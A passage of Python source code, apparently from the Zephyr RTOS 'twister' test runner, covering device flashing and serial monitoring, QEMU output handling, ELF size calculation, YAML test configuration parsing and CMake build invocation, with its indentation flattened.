command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--snr")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
pre_script = hardware.pre_script
post_flash_script = hardware.post_flash_script
post_script = hardware.post_script
if pre_script:
self.run_custom_script(pre_script, 30)
try:
ser = serial.Serial(
serial_device,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
if serial_pty and ser_pty_process:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
logger.debug(stdout.decode())
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state == "timeout":
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
self.instance.reason = "Timeout"
self.instance.results = harness.tests
# sometimes a test instance hasn't been executed successfully with an
# empty dictionary results, in order to include it into final report,
# so fill the results as BLOCK
if self.instance.results == {}:
for k in self.instance.testcase.cases:
self.instance.results[k] = 'BLOCK'
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run, we check
for these to collect whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
if "ignore_qemu_crash" in instance.testcase.tags:
self.ignore_qemu_crash = True
self.ignore_unexpected_eof = True
else:
self.ignore_qemu_crash = False
self.ignore_unexpected_eof = False
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
The guest virtual time in QEMU icount mode isn't host time and
it's maintained by counting guest instructions, so we use QEMU
process exection time to mostly simulate the time of guest OS.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
ignore_unexpected_eof=False):
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
#there's possibility we polled nothing because
#of not enough CPU time scheduled by host for
#QEMU process during p.poll(this_timeout)
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
if not ignore_unexpected_eof:
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug(f"QEMU ({pid}): {line}")
harness.handle(line)
if harness.state:
# if we have registered a fail make sure the state is not
# overridden by a false success message coming from the
# testsuite
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
# if we get some state, that means test is doing well, we reset
# the timeout and wait for 2 more seconds to catch anything
# printed late. We wait much longer if code
# coverage is enabled since dumping this information can
# take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
handler.record(harness)
handler_time = time.time() - start_time
logger.debug(f"QEMU ({pid}) complete ({out_state}) after {handler_time} seconds")
if out_state == "timeout":
handler.instance.reason = "Timeout"
handler.set_state("failed", handler_time)
elif out_state == "failed":
handler.instance.reason = "Failed"
handler.set_state("failed", handler_time)
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.reason = out_state
handler.set_state("failed", handler_time)
else:
handler.set_state(out_state, handler_time)
log_out_fp.close()
out_fp.close()
in_fp.close()
if pid:
try:
if pid:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
# Oh well, as long as it's dead! User probably sent Ctrl-C
pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
self.thread = threading.Thread(name=self.name, target=QEMUHandler._thread,
args=(self, self.timeout, self.build_dir,
self.log_fn, self.fifo_fn,
self.pid_fn, self.results, harness,
self.ignore_unexpected_eof))
self.instance.results = harness.tests
self.thread.daemon = True
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
self.thread.start()
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
logger.debug("Running %s (%s)" % (self.name, self.type_str))
command = [self.generator_cmd]
command += ["-C", self.build_dir, "run"]
is_timeout = False
qemu_pid = None
with subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, cwd=self.build_dir) as proc:
logger.debug("Spawning QEMUHandler Thread for %s" % self.name)
try:
proc.wait(self.timeout)
except subprocess.TimeoutExpired:
# sometimes QEMU can't handle SIGTERM signal correctly
# in that case kill -9 QEMU process directly and leave
# twister to judge testing result by console output
is_timeout = True
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
try:
os.kill(qemu_pid, signal.SIGKILL)
except ProcessLookupError:
pass
proc.wait()
if harness.state == "passed":
self.returncode = 0
else:
self.returncode = proc.returncode
else:
proc.terminate()
proc.kill()
self.returncode = proc.returncode
else:
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
logger.debug(f"No timeout, return code from QEMU ({qemu_pid}): {proc.returncode}")
self.returncode = proc.returncode
# Need to wait for harness to finish processing
# output from QEMU. Otherwise it might miss some
# error messages.
self.thread.join()
if os.path.exists(self.pid_fn):
qemu_pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
logger.debug(f"return code from QEMU ({qemu_pid}): {self.returncode}")
if (self.returncode != 0 and not self.ignore_qemu_crash) or not harness.state:
self.set_state("failed", 0)
if is_timeout:
self.instance.reason = "Timeout"
else:
self.instance.reason = "Exited with {}".format(self.returncode)
def get_fifo(self):
return self.fifo_fn
class SizeCalculator:
alloc_sections = [
"bss",
"noinit",
"app_bss",
"app_noinit",
"ccm_bss",
"ccm_noinit"
]
rw_sections = [
"datas",
"initlevel",
"exceptions",
"initshell",
"_static_thread_data_area",
"k_timer_area",
"k_mem_slab_area",
"k_mem_pool_area",
"sw_isr_table",
"k_sem_area",
"k_mutex_area",
"app_shmem_regions",
"_k_fifo_area",
"_k_lifo_area",
"k_stack_area",
"k_msgq_area",
"k_mbox_area",
"k_pipe_area",
"net_if_area",
"net_if_dev_area",
"net_l2_area",
"net_l2_data",
"k_queue_area",
"_net_buf_pool_area",
"app_datas",
"kobject_data",
"mmu_tables",
"app_pad",
"priv_stacks",
"ccm_data",
"usb_descriptor",
"usb_data", "usb_bos_desc",
"uart_mux",
'log_backends_sections',
'log_dynamic_sections',
'log_const_sections',
"app_smem",
'shell_root_cmds_sections',
'log_const_sections',
"font_entry_sections",
"priv_stacks_noinit",
"_GCOV_BSS_SECTION_NAME",
"gcov",
"nocache",
"devices",
"k_heap_area",
]
# These get copied into RAM only on non-XIP
ro_sections = [
"rom_start",
"text",
"ctors",
"init_array",
"reset",
"z_object_assignment_area",
"rodata",
"net_l2",
"vector",
"sw_isr_table",
"settings_handler_static_area",
"bt_l2cap_fixed_chan_area",
"bt_l2cap_br_fixed_chan_area",
"bt_gatt_service_static_area",
"vectors",
"net_socket_register_area",
"net_ppp_proto",
"shell_area",
"tracing_backend_area",
"ppp_protocol_handler_area",
]
def __init__(self, filename, extra_sections):
"""Constructor
@param filename Path to the output binary
The <filename> is parsed by objdump to determine section sizes
"""
# Make sure this is an ELF binary
with open(filename, "rb") as f:
magic = f.read(4)
try:
if magic != b'\x7fELF':
raise TwisterRuntimeError("%s is not an ELF binary" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
# Search for CONFIG_XIP in the ELF's list of symbols using NM and AWK.
# GREP can not be used as it returns an error if the symbol is not
# found.
is_xip_command = "nm " + filename + \
" | awk '/CONFIG_XIP/ { print $3 }'"
is_xip_output = subprocess.check_output(
is_xip_command, shell=True, stderr=subprocess.STDOUT).decode(
"utf-8").strip()
try:
if is_xip_output.endswith("no symbols"):
raise TwisterRuntimeError("%s has no symbol information" % filename)
except Exception as e:
print(str(e))
sys.exit(2)
self.is_xip = (len(is_xip_output) != 0)
self.filename = filename
self.sections = []
self.rom_size = 0
self.ram_size = 0
self.extra_sections = extra_sections
self._calculate_sizes()
def get_ram_size(self):
"""Get the amount of RAM the application will use up on the device
@return amount of RAM, in bytes
"""
return self.ram_size
def get_rom_size(self):
"""Get the size of the data that this application uses on device's flash
@return amount of ROM, in bytes
"""
return self.rom_size
def unrecognized_sections(self):
"""Get a list of sections inside the binary that weren't recognized
@return list of unrecognized section names
"""
slist = []
for v in self.sections:
if not v["recognized"]:
slist.append(v["name"])
return slist
def _calculate_sizes(self):
""" Calculate RAM and ROM usage by section """
objdump_command = "objdump -h " + self.filename
objdump_output = subprocess.check_output(
objdump_command, shell=True).decode("utf-8").splitlines()
for line in objdump_output:
words = line.split()
if not words: # Skip lines that are too short
continue
index = words[0]
if not index[0].isdigit(): # Skip lines that do not start
continue # with a digit
name = words[1] # Skip lines with section names
if name[0] == '.': # starting with '.'
continue
# TODO this doesn't actually reflect the size in flash or RAM as
# it doesn't include linker-imposed padding between sections.
# It is close though.
size = int(words[2], 16)
if size == 0:
continue
load_addr = int(words[4], 16)
virt_addr = int(words[3], 16)
# Add section to memory use totals (for both non-XIP and XIP scenarios)
# Unrecognized section names are not included in the calculations.
recognized = True
if name in SizeCalculator.alloc_sections:
self.ram_size += size
stype = "alloc"
elif name in SizeCalculator.rw_sections:
self.ram_size += size
self.rom_size += size
stype = "rw"
elif name in SizeCalculator.ro_sections:
self.rom_size += size
if not self.is_xip:
self.ram_size += size
stype = "ro"
else:
stype = "unknown"
if name not in self.extra_sections:
recognized = False
self.sections.append({"name": name, "load_addr": load_addr,
"size": size, "virt_addr": virt_addr,
"type": stype, "recognized": recognized})
class TwisterConfigParser:
"""Class to read test case files with semantic checking
"""
def __init__(self, filename, schema):
"""Instantiate a new TwisterConfigParser object
@param filename Source .yaml file to read
"""
self.data = {}
self.schema = schema
self.filename = filename
self.tests = {}
self.common = {}
def load(self):
self.data = scl.yaml_load_verify(self.filename, self.schema)
if 'tests' in self.data:
self.tests = self.data['tests']
if 'common' in self.data:
self.common = self.data['common']
def _cast_value(self, value, typestr):
if isinstance(value, str):
v = value.strip()
if typestr == "str":
return v
elif typestr == "float":
return float(value)
elif typestr == "int":
return int(value)
elif typestr == "bool":
return value
elif typestr.startswith("list") and isinstance(value, list):
return value
elif typestr.startswith("list") and isinstance(value, str):
vs = v.split()
if len(typestr) > 4 and typestr[4] == ":":
return [self._cast_value(vsi, typestr[5:]) for vsi in vs]
else:
return vs
elif typestr.startswith("set"):
vs = v.split()
if len(typestr) > 3 and typestr[3] == ":":
return {self._cast_value(vsi, typestr[4:]) for vsi in vs}
else:
return set(vs)
elif typestr.startswith("map"):
return value
else:
raise ConfigurationError(
self.filename, "unknown type '%s'" % value)
def get_test(self, name, valid_keys):
"""Get a dictionary representing the keys/values within a test
@param name The test in the .yaml file to retrieve data from
@param valid_keys A dictionary representing the intended semantics
for this test. Each key in this dictionary is a key that could
be specified, if a key is given in the .yaml file which isn't in
here, it will generate an error. Each value in this dictionary
is another dictionary containing metadata:
"default" - Default value if not given
"type" - Data type to convert the text value to. Simple types
supported are "str", "float", "int", "bool" which will get
converted to respective Python data types. "set" and "list"
may also be specified which will split the value by
whitespace (but keep the elements as strings). finally,
"list:<type>" and "set:<type>" may be given which will
perform a type conversion after splitting the value up.
"required" - If true, raise an error if not defined. If false
and "default" isn't specified, a type conversion will be
done on an empty string
@return A dictionary containing the test key-value pairs with
type conversion and default values filled in per valid_keys
"""
d = {}
for k, v in self.common.items():
d[k] = v
for k, v in self.tests[name].items():
if k in d:
if isinstance(d[k], str):
# By default, we just concatenate string values of keys
# which appear both in "common" and per-test sections,
# but some keys are handled in adhoc way based on their
# semantics.
if k == "filter":
d[k] = "(%s) and (%s)" % (d[k], v)
else:
d[k] += " " + v
else:
d[k] = v
for k, kinfo in valid_keys.items():
if k not in d:
if "required" in kinfo:
required = kinfo["required"]
else:
required = False
if required:
raise ConfigurationError(
self.filename,
"missing required value for '%s' in test '%s'" %
(k, name))
else:
if "default" in kinfo:
default = kinfo["default"]
else:
default = self._cast_value("", kinfo["type"])
d[k] = default
else:
try:
d[k] = self._cast_value(d[k], kinfo["type"])
except ValueError:
raise ConfigurationError(
self.filename, "bad %s value '%s' for key '%s' in name '%s'" %
(kinfo["type"], d[k], k, name))
return d
class Platform:
"""Class representing metadata for a particular platform
Maps directly to BOARD when building"""
platform_schema = scl.yaml_load(os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "platform-schema.yaml"))
def __init__(self):
"""Constructor.
"""
self.name = ""
self.twister = True
# if no RAM size is specified by the board, take a default of 128K
self.ram = 128
self.ignore_tags = []
self.only_tags = []
self.default = False
# if no flash size is specified by the board, take a default of 512K
self.flash = 512
self.supported = set()
self.arch = ""
self.type = "na"
self.simulation = "na"
self.supported_toolchains = []
self.env = []
self.env_satisfied = True
self.filter_data = dict()
def load(self, platform_file):
scp = TwisterConfigParser(platform_file, self.platform_schema)
scp.load()
data = scp.data
self.name = data['identifier']
self.twister = data.get("twister", True)
# if no RAM size is specified by the board, take a default of 128K
self.ram = data.get("ram", 128)
testing = data.get("testing", {})
self.ignore_tags = testing.get("ignore_tags", [])
self.only_tags = testing.get("only_tags", [])
self.default = testing.get("default", False)
# if no flash size is specified by the board, take a default of 512K
self.flash = data.get("flash", 512)
self.supported = set()
for supp_feature in data.get("supported", []):
for item in supp_feature.split(":"):
self.supported.add(item)
self.arch = data['arch']
self.type = data.get('type', "na")
self.simulation = data.get('simulation', "na")
self.supported_toolchains = data.get("toolchain", [])
self.env = data.get("env", [])
self.env_satisfied = True
for env in self.env:
if not os.environ.get(env, None):
self.env_satisfied = False
def __repr__(self):
return "<%s on %s>" % (self.name, self.arch)
class DisablePyTestCollectionMixin(object):
__test__ = False
class TestCase(DisablePyTestCollectionMixin):
"""Class representing a test application
"""
def __init__(self, testcase_root, workdir, name):
"""TestCase constructor.
This gets called by TestSuite as it finds and reads test yaml files.
Multiple TestCase instances may be generated from a single testcase.yaml,
each one corresponds to an entry within that file.
We need to have a unique name for every single test case. Since
a testcase.yaml can define multiple tests, the canonical name for
the test case is <workdir>/<name>.
@param testcase_root os.path.abspath() of one of the --testcase-root
@param workdir Sub-directory of testcase_root where the
.yaml test configuration file was found
@param name Name of this test case, corresponding to the entry name
in the test case configuration file. For many test cases that just
define one test, can be anything and is usually "test". This is
really only used to distinguish between different cases when
the testcase.yaml defines multiple tests
"""
self.source_dir = ""
self.yamlfile = ""
self.cases = []
self.name = self.get_unique(testcase_root, workdir, name)
self.id = name
self.type = None
self.tags = set()
self.extra_args = None
self.extra_configs = None
self.arch_allow = None
self.arch_exclude = None
self.skip = False
self.platform_exclude = None
self.platform_allow = None
self.toolchain_exclude = None
self.toolchain_allow = None
self.tc_filter = None
self.timeout = 60
self.harness = ""
self.harness_config = {}
self.build_only = True
self.build_on_all = False
self.slow = False
self.min_ram = -1
self.depends_on = None
self.min_flash = -1
self.extra_sections = None
self.integration_platforms = []
@staticmethod
def get_unique(testcase_root, workdir, name):
canonical_testcase_root = os.path.realpath(testcase_root)
if Path(canonical_zephyr_base) in Path(canonical_testcase_root).parents:
# This is in ZEPHYR_BASE, so include path in name for uniqueness
# FIXME: We should not depend on path of test for unique names.
relative_tc_root = os.path.relpath(canonical_testcase_root,
start=canonical_zephyr_base)
else:
relative_tc_root = ""
# workdir can be "."
unique = os.path.normpath(os.path.join(relative_tc_root, workdir, name))
check = name.split(".")
if len(check) < 2:
raise TwisterException(f"""bad test name '{name}' in {testcase_root}/{workdir}. \
Tests should reference the category and subsystem with a dot as a separator.
"""
)
return unique
@staticmethod
def scan_file(inf_name):
suite_regex = re.compile(
# do not match until end-of-line, otherwise we won't allow
# stc_regex below to catch the ones that are declared in the same
# line--as we only search starting the end of this match
br"^\s*ztest_test_suite\(\s*(?P<suite_name>[a-zA-Z0-9_]+)\s*,",
re.MULTILINE)
stc_regex = re.compile(
br"^\s*" # empy space at the beginning is ok
# catch the case where it is declared in the same sentence, e.g:
#
# ztest_test_suite(mutex_complex, ztest_user_unit_test(TESTNAME));
br"(?:ztest_test_suite\([a-zA-Z0-9_]+,\s*)?"
# Catch ztest[_user]_unit_test-[_setup_teardown](TESTNAME)
br"ztest_(?:1cpu_)?(?:user_)?unit_test(?:_setup_teardown)?"
# Consume the argument that becomes the extra testcse
br"\(\s*"
br"(?P<stc_name>[a-zA-Z0-9_]+)"
# _setup_teardown() variant has two extra arguments that we ignore
br"(?:\s*,\s*[a-zA-Z0-9_]+\s*,\s*[a-zA-Z0-9_]+)?"
br"\s*\)",
# We don't check how it finishes; we don't care
re.MULTILINE)
suite_run_regex = re.compile(
br"^\s*ztest_run_test_suite\((?P<suite_name>[a-zA-Z0-9_]+)\)",
re.MULTILINE)
achtung_regex = re.compile(
br"(#ifdef|#endif)",
re.MULTILINE)
warnings = None
with open(inf_name) as inf:
if os.name == 'nt':
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'access': mmap.ACCESS_READ}
else:
mmap_args = {'fileno': inf.fileno(), 'length': 0, 'flags': mmap.MAP_PRIVATE, 'prot': mmap.PROT_READ,
'offset': 0}
with contextlib.closing(mmap.mmap(**mmap_args)) as main_c:
suite_regex_match = suite_regex.search(main_c)
if not suite_regex_match:
# can't find ztest_test_suite, maybe a client, because
# it includes ztest.h
return None, None
suite_run_match = suite_run_regex.search(main_c)
if not suite_run_match:
raise ValueError("can't find ztest_run_test_suite")
achtung_matches = re.findall(
achtung_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
if achtung_matches:
warnings = "found invalid %s in ztest_test_suite()" \
% ", ".join(sorted({match.decode() for match in achtung_matches},reverse = True))
_matches = re.findall(
stc_regex,
main_c[suite_regex_match.end():suite_run_match.start()])
for match in _matches:
if not match.decode().startswith("test_"):
warnings = "Found a test that does not start with test_"
matches = [match.decode().replace("test_", "", 1) for match in _matches]
return matches, warnings
def scan_path(self, path):
subcases = []
for filename in glob.glob(os.path.join(path, "src", "*.c*")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
raise TwisterRuntimeError("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
for filename in glob.glob(os.path.join(path, "*.c")):
try:
_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.run = False
self.results = {}
def __getstate__(self):
d = self.__dict__.copy()
return d
def __setstate__(self, d):
self.__dict__.update(d)
def __lt__(self, other):
return self.name < other.name
@staticmethod
def testcase_runnable(testcase, fixtures):
can_run = False
# console harness allows us to run the test and capture data.
if testcase.harness in [ 'console', 'ztest']:
can_run = True
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = testcase.harness_config.get('fixture')
if fixture:
can_run = (fixture in fixtures)
elif testcase.harness:
can_run = False
else:
can_run = True
return can_run
# Global testsuite parameters
def check_runnable(self, enable_slow=False, filter='buildable', fixtures=[]):
# right now we only support building on windows. running is still work
# in progress.
if os.name == 'nt':
return False
# we asked for build-only on the command line
if self.testcase.build_only:
return False
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
return False
target_ready = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["mdb-nsim", "nsim", "renode", "qemu", "tsim"] or \
filter == 'runnable')
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
target_ready = False
if self.platform.simulation == "mdb-nsim":
if not find_executable("mdb"):
target_ready = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
target_ready = False
if self.platform.simulation == "tsim":
if not find_executable("tsim-leon3"):
target_ready = False
testcase_runnable = self.testcase_runnable(self.testcase, fixtures)
return testcase_runnable and target_ready
def create_overlay(self, platform, enable_asan=False, enable_ubsan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "twister/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "twister")
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
if enable_ubsan:
if platform.type == "native":
content = content + "\nCONFIG_UBSAN=y"
if content:
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
f.write(content)
return content
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def fill_results_by_status(self):
"""Fills results according to self.status
The method is used to propagate the instance level status
to the test cases inside. Useful when the whole instance is skipped
and the info is required also at the test cases level for reporting.
Should be used with caution, e.g. should not be used
to fill all results with passes
"""
status_to_verdict = {
'skipped': 'SKIP',
'error': 'BLOCK',
'failure': 'FAILED'
}
for k in self.results:
self.results[k] = status_to_verdict[self.status]
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
log_msg = ""
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|RAM|SRAM)' overflowed by", log_msg)
if res and not self.overflow_as_errors:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
aflags = "-Wa,--fatal-warnings"
gen_defines_args = "--err-on-deprecated-properties"
else:
ldflags = cflags = aflags = ""
gen_defines_args = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DEXTRA_CFLAGS="{cflags}"',
f'-DEXTRA_AFLAGS="{aflags}',
f'-DEXTRA_LDFLAGS="{ldflags}"',
f'-DEXTRA_GEN_DEFINES_ARGS={gen_defines_args}',
f'-G{self.generator}'
]
if self.cmake_only:
cmake_args.append("-DCMAKE_EXPORT_COMPILE_COMMANDS=1")
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
